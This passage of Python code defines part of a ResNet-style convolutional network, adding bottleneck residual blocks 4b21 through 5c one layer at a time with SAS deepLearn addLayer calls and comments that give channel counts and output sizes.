# ------------------- Residual Layer 4B21 -----------------------
# res4b21_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b21_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b20'])
# res4b21_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b21_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b21_branch2a'])
# res4b21_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b21_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b21_branch2a'])
# res4b21_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b21_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b21_branch2b'])
# res4b21_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b21_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b21_branch2b'])
# res4b21_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b21_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b21_branch2c'])
# res4b21 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b21',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b21_branch2c', 'res4b20'])
# ------------------- Residual Layer 4B22 -----------------------
# res4b22_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b22_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b21'])
# res4b22_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b22_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b22_branch2a'])
# res4b22_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b22_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b22_branch2a'])
# res4b22_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b22_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b22_branch2b'])
# res4b22_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b22_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b22_branch2b'])
# res4b22_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b22_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b22_branch2c'])
# res4b22 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b22',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b22_branch2c', 'res4b21'])
# ------------------- Residual Layer 4B23 -----------------------
# res4b23_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b23_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b22'])
# res4b23_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b23_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b23_branch2a'])
# res4b23_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b23_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b23_branch2a'])
# res4b23_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b23_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b23_branch2b'])
# res4b23_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b23_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b23_branch2b'])
# res4b23_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b23_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b23_branch2c'])
# res4b23 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b23',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b23_branch2c', 'res4b22'])
# ------------------- Residual Layer 4B24 -----------------------
# res4b24_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b23'])
# res4b24_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b24_branch2a'])
# res4b24_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b24_branch2a'])
# res4b24_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b24_branch2b'])
# res4b24_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b24_branch2b'])
# res4b24_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b24_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b24_branch2c'])
# res4b24 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b24',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b24_branch2c', 'res4b23'])
# ------------------- Residual Layer 4B25 -----------------------
# res4b25_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b24'])
# res4b25_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b25_branch2a'])
# res4b25_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b25_branch2a'])
# res4b25_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b25_branch2b'])
# res4b25_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b25_branch2b'])
# res4b25_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b25_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b25_branch2c'])
# res4b25 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b25',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b25_branch2c', 'res4b24'])
# ------------------- Residual Layer 4B26 -----------------------
# res4b26_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b25'])
# res4b26_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b26_branch2a'])
# res4b26_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b26_branch2a'])
# res4b26_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b26_branch2b'])
# res4b26_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b26_branch2b'])
# res4b26_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b26_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b26_branch2c'])
# res4b26 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b26',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b26_branch2c', 'res4b25'])
# ------------------- Residual Layer 4B27 -----------------------
# res4b27_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b26'])
# res4b27_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b27_branch2a'])
# res4b27_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b27_branch2a'])
# res4b27_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b27_branch2b'])
# res4b27_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b27_branch2b'])
# res4b27_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b27_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b27_branch2c'])
# res4b27 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b27',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b27_branch2c', 'res4b26'])
# ------------------- Residual Layer 4B28 -----------------------
# res4b28_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b27'])
# res4b28_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b28_branch2a'])
# res4b28_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b28_branch2a'])
# res4b28_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b28_branch2b'])
# res4b28_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b28_branch2b'])
# res4b28_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b28_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b28_branch2c'])
# res4b28 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b28',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b28_branch2c', 'res4b27'])
# ------------------- Residual Layer 4B29 -----------------------
# res4b29_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b28'])
# res4b29_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b29_branch2a'])
# res4b29_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b29_branch2a'])
# res4b29_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b29_branch2b'])
# res4b29_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b29_branch2b'])
# res4b29_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b29_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b29_branch2c'])
# res4b29 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b29',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b29_branch2c', 'res4b28'])
# ------------------- Residual Layer 4B30 -----------------------
# res4b30_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b29'])
# res4b30_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b30_branch2a'])
# res4b30_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b30_branch2a'])
# res4b30_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b30_branch2b'])
# res4b30_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b30_branch2b'])
# res4b30_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b30_branch2c'])
# res4b30 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b30_branch2c', 'res4b29'])
# ------------------- Residual Layer 4B31 -----------------------
# res4b31_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b30'])
# res4b31_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b31_branch2a'])
# res4b31_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b31_branch2a'])
# res4b31_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b31_branch2b'])
# res4b31_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b31_branch2b'])
# res4b31_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b31_branch2c'])
# res4b31 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b31_branch2c', 'res4b30'])
# ------------------- Residual Layer 4B32 -----------------------
# res4b32_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b31'])
# res4b32_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b32_branch2a'])
# res4b32_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b32_branch2a'])
# res4b32_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b32_branch2b'])
# res4b32_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b32_branch2b'])
# res4b32_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b32_branch2c'])
# res4b32 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b32_branch2c', 'res4b31'])
# ------------------- Residual Layer 4B33 -----------------------
# res4b33_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b32'])
# res4b33_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b33_branch2a'])
# res4b33_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b33_branch2a'])
# res4b33_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b33_branch2b'])
# res4b33_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b33_branch2b'])
# res4b33_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b33_branch2c'])
# res4b33 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b33_branch2c', 'res4b32'])
# ------------------- Residual Layer 4B34 -----------------------
# res4b34_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b33'])
# res4b34_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b34_branch2a'])
# res4b34_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b34_branch2a'])
# res4b34_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b34_branch2b'])
# res4b34_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b34_branch2b'])
# res4b34_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b34_branch2c'])
# res4b34 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b34_branch2c', 'res4b33'])
# ------------------- Residual Layer 4B35 -----------------------
# res4b35_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b34'])
# res4b35_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b35_branch2a'])
# res4b35_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b35_branch2a'])
# res4b35_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b35_branch2b'])
# res4b35_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b35_branch2b'])
# res4b35_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b35_branch2c'])
# res4b35 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b35_branch2c', 'res4b34'])
# ------------- Layer 5A -------------------- */
# res5a_branch1 layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch1',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res4b35'])
# res5a_branch1 batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5a_branch1'])
# res5a_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res4b35'])
# res5a_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5a_branch2a'])
# res5a_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5a_branch2a'])
# res5a_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5a_branch2b'])
# res5a_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5a_branch2b'])
# res5a_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5a_branch2c'])
# res5a residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5a_branch2c', 'bn5a_branch1'])
# ------------------- Residual Layer 5B -----------------------
# res5b_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res5a'])
# res5b_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5b_branch2a'])
# res5b_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5b_branch2a'])
# res5b_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5b_branch2b'])
# res5b_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5b_branch2b'])
# res5b_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5b_branch2c'])
# res5b residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5b_branch2c', 'res5a'])
# ------------------- Residual Layer 5C -----------------------
# res5c_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res5b'])
# res5c_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2a',
layer=dict(type='batchnorm', act='relu'),
